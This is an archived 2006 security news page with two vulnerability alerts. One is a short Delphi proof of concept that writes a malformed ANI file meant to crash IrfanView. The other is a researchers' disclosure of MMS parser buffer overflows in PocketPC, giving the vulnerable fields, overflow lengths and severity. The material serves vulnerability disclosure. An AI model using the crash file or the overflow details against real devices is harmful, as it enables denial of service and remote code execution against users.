Spamalertz.com - SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus

Popular

Syndicate

ATOM 0.3

OPML

Latest Alertz

Ads

InfanView 3.98 (with plugins) - Access violation at processing images ANI files

Windows Focus
Monday, 14 August 2006
Example (in Delphi): ===============ani.dpr=============== program ani; {$APPTYPE CONSOLE} const FileName=file.ani; Len=113; `Buf=#$52#$49#$46#$46#$00#$00#$00#$00#$41#$43#$4F#$4E#$00#$00#$00#$00#$24 #$00+ #$00#$00#$24#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00 #$00+ #$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00 #$00+ #$4C#$49#$53#$54#$00#$00#$00#$00#$66#$72#$61#$6D#$69#$63#$6F#$6E#$00#$00 #$00+ #$00#$00#$00#$00#$00#$01#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$00#$02 #$00+ #$16#$00#$00#$00#$28#$00#$00#$00#$FF#$FF#$FF#$00#$02#$00#$00#$00#$00#$00 #$01;` var F:File; I:Byte; begin AssignFile(F,FileName); Rewrite(F,1); BlockWrite(F, Buf, Len); CloseFile(F); end. ===============ani.dpr=============== 1) Compile and Run "ani.dpr" with Delphi 2) Open "file.ani" with InfanView

PocketPC MMS - Remote Code Injection/Execution Vulnerability andDenial-of-Service

Mobile Threat
Monday, 14 August 2006
Vulnerability Report ----------------------------- Vendor: Microsoft and ArcSoft Product: PocketPC OS and MMS Composer Version(s): MMS Composer: 1.5.5.6, 2.0.0.13 (possible others) Platform: PocketPC (tested on: WinCE 4.2 and WinCE 4.21, possible others) Architecture: ARM Device(s): HP iPAQ h6315, i-mate PDA2k (OEM: HTC BlueAngle) (possible others) Application: MMS User Agent (Inbox application) Application binary: tmail.exe ----------------------------- Reporter(s): Collin Mulliner (technical contact) Prof. Giovanni Vigna Affiliation: Reliable Software Group, University of California Santa Barbara ----------------------------- Executive Summary: Multiple buffer overflows in MMS parsing code, allow denial-of-service and REMOTE CODE INJECTION/EXECUTION via MMS. ----------------------------- Disclosure Time Line: July 12. 2006 : Vulnerability Report to ArcSoft and Microsoft July 19. 2006 : Reply by ArcSoft and Microsoft Aug. 02. 2006 : Vendor Provides Bug Fix to OEMs Aug. 04. 2006 : Public Disclosure at DEFCON-14 ----------------------------- BugFix: BugFix is awaiting approval by OEMs ----------------------------- Brief Technical Details: 1.0) UDP port 2948 open on all interfaces Devices accept WAPPush via UDP port 2948 on the wireless LAN (Wi-Fi) interface. This is unnecessary and can be used for Denial-of-Service attacks. ----------------------------- 2.0) Multiple buffer overflows in MMS message parser MMS Message parts: 2.1) M-Notification.ind 2.2) M-Retrieve.conf (Header) 2.3) M-Retrieve.conf (Body) 2.4) SMIL parser (Message display function) ----------------------------- 2.1) Parser for M-Notification.ind Buffer overflows in handlers for the following header fields: 1) TransactionID 2) Subject 3) ContentLocation Application crashes. Non-critical. Denial-of-Service attack possible. Exploitable via UDP port 2948. Categorization: MEDIUM (denial-of-service via wireless LAN) Exploit: Proof-of-Concept available (DoS) ----------------------------- 2.2) Parser for M-Retrieve.conf (Header) Buffer overflows in handlers for the following header fields: 1) Subject 2) Content-Type (can overwrite return address on stack) 3) start-info parameter of content-type Application crashes. Categorization: LOW (exploitation requires control of MMS infrastructure) ----------------------------- 2.3) Parser for M-Retrieve.conf (Body) Buffer overflows in handlers for the following body fields: Multi-Part Entry header: 1) Content-Type 2) Content-ID 3) ContentLocation In all cases it is possible to overwrite the return address. Categorization: LOW (exploitation requires control of MMS infrastructure) ----------------------------- 2.4) Parser for SMIL (Message display function) Transported in: M-Retrieve.conf body content Buffer overflows in handlers for the following parameters: 1) ID parameter of REGION tag ID="CONTENT" CONTENT is copied into stack-based variable, CONTENT can be arbitrary long. 2) REGION parameter of TEXT tag REGION="CONTENT" CONTENT is copied into stack-based variable, CONTENT can be arbitrary long. Both overflows allow one to overwrite the return address on the stack. Both are exploitable and we were able to create a proof-of-concept exploit. The exploit is triggered by viewing the malicious MMS message (this is different from other exploits that require substantial user interaction -- e.g., to install a program). Overflow happens after 300 bytes in version 1.5.5.6 and after 400 bytes in version 2.0.0.13. Categorization: CRITICAL (REMOTE CODE EXECUTION) Exploit: Proof-of-Concept available (code execution) ----------------------------- Related DEFCON-14 slides and Proof-of-Concept DoS tool are available here: http://www.mulliner.org/pocketpc/

More...

Informix Long Username Buffer Overflow Vulnerability

<< Start < Prev 11 12 13 14 15 16 17 18 19 20 Next > End >>

Main Menu

SpamAlerts | Windows | Linux | Tutorials | Excell | WhitePapers | News | Spam | Virus

Affiliates

Online Store Free Ringtones Seo Directory IWebListin Jobs in India Freshers Jobs listings. Winkeyfinder